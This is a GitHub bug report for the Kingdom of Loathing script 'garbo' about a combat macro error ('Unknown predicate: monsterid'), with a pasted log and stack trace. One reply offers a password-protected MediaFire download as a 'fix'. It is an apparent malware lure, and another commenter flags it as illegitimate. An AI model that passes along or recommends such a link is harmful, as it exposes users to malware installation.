### ISSUE TITLE
[BUG] monster ID macro error

### ISSUE THREAD

**Issue by Spacetemp** [loathers/garbage-collector#2045]
[Sinnaj63_20240827.txt](https://github.com/user-attachments/files/16758943/Sinnaj63_20240827.txt).

Log is attached. Something seems to be wrong with the macro. I think it's just some kind of typographical error? Either way it stops after turn 21 with every mime executive. I tried it a lot so it's pretty reproducable.

Garbo and Mafia are also up to date

[...]
Round 20: Sinnaj63 uses the facsimile dictionary!
Round 21: JILL OF JILL JILLS refreshes you with some blood stolen from your opponent. Well... I guess that would be refreshing.
Round 21: You gain 2 hit points
Round 21: cheerless mime executive drops 33 attack power.
Round 21: cheerless mime executive drops 32 defense.
Round 21: You lose 6 hit points
Preference _concoctionDatabaseRefreshes changed from 334 to 335
Round 21: Sinnaj63 executes a macro!
You're on your own, partner. (Macro Aborted - Unknown predicate: (monsterid 2048)
[Click here to continue in the relay browser.](https://github.com/loathers/garbage-collector/issues/main.php)

Autoattack is disabled.
No spading data has been collected yet. Please try again later.
logPreferenceChange => false
Preference logPreferenceChange changed from true to false
logPreferenceChangeFilter => spadingData,combo_lastTileCombed,_beachLayout,_beachMinutes,_beachCombing
CCS set to garbo
autoSatisfyWithCoinmasters => false
dontStopForCounters => false
hpAutoRecovery => 0.75
hpAutoRecoveryTarget => 1
mpAutoRecovery => 0.35
mpAutoRecoveryTarget => 0.5
currentMood => default
autoGarish => false
allowNonMoodBurning => true
valueOfInventory => 1.8
choiceAdventure1106 => 0
choiceAdventure1107 => 0
choiceAdventure1340 => 0
choiceAdventure1341 => 0
shadowLabyrinthGoal => browser
choiceAdventure1324 => 0
Encounter: cheerless mime executive
You fought 6 cheerless mime executive at the beginning of the day, and an additional 0 digitized cheerless mime executive throughout the day. Good work, probably!
Including this, you have fought 85 across all ascensions today
Extreme Items:
This run of garbo, across 0 turns you generated 278 meat, with 278 raw meat and 0 from items
So far today, across 0 turns you generated -75,847 meat, with -165,908 raw meat and 90,061 from items
JavaScript exception: Combat exception! Last macro error: Macro Aborted - Unknown predicate: (monsterid 2048. Exception KoLmafia error: You're on your own, partner. (Macro Aborted - Unknown predicate: (monsterid 2048). (file:/C:/Users/sinna/Desktop/KoL/scripts/garbage-collector/garbo.js#36677)
at file:/C:/Users/sinna/Desktop/KoL/scripts/garbage-collector/garbo.js:36677 (runCombatBy)
at file:/C:/Users/sinna/Desktop/KoL/scripts/garbage-collector/garbo.js:36686 (withMacro)
at file:/C:/Users/sinna/Desktop/KoL/scripts/garbage-collector/garbo.js:35022
at file:/C:/Users/sinna/Desktop/KoL/scripts/garbage-collector/garbo.js:34948 (run)
at file:/C:/Users/sinna/Desktop/KoL/scripts/garbage-collector/garbo.js:37832 (runTargetFight)
at file:/C:/Users/sinna/Desktop/KoL/scripts/garbage-collector/garbo.js:39711
at file:/C:/Users/sinna/Desktop/KoL/scripts/garbage-collector/garbo.js:36830 (withStash)
at file:/C:/Users/sinna/Desktop/KoL/scripts/garbage-collector/garbo.js:39619 (dailyFights)
at file:/C:/Users/sinna/Desktop/KoL/scripts/garbage-collector/garbo.js:45301
at file:/C:/Users/sinna/Desktop/KoL/scripts/garbage-collector/garbo.js:36851 (withClan)
at file:/C:/Users/sinna/Desktop/KoL/scripts/garbage-collector/garbo.js:36845 (withVIPClan)
at file:/C:/Users/sinna/Desktop/KoL/scripts/garbage-collector/garbo.js:45279
at file:/C:/Users/sinna/Desktop/KoL/scripts/garbage-collector/garbo.js:36830 (withStash)
at file:/C:/Users/sinna/Desktop/KoL/scripts/garbage-collector/garbo.js:45278 (main)

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by poshpotato** [comment]
to be clear ahmar's post is almost certainly not legitimate

**Comment by horrible-little-slime** [comment]
Redundant with #2046, which is better fleshed out
